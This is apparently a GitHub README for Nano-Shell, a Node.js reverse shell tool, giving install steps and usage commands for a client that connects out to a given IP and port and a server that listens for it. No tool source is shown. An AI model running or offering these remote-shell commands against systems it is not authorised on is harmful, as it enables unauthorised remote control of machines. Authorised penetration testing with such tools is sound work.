/Nano-Shell

A reverse shell written with NodeJS

Primary LanguageJavaScript

Welcome to Nano-Shell 👋

Version Maintenance License: ISC

Simple JS reverse shell

Install

git clone https://github.com/ghostfighter50/Nano-Shell #downloads the repository

cd Nano-Shell #navigates into repository folder

npm i -g #installs the required packages

nano-shell --help #checks if it's installed

Usage

Client :

nano-shell -u <ip> -p <port> 

Server :

nano-shell -h <port>

Screenshots

On Unix systems :

Linux

On Windows system :

Windows

Run tests

npm run test

Author

👤 Ghostfighter50

🤝 Contributing

Contributions, issues and feature requests are welcome!
Feel free to check issues page. You can also take a look at the contributing guide.

Show your support

Give a ⭐️ if this project helped you!

📝 License

Copyright © 2020 Ghostfighter50.
This project is ISC licensed.


This README was generated with ❤️ by readme-md-generator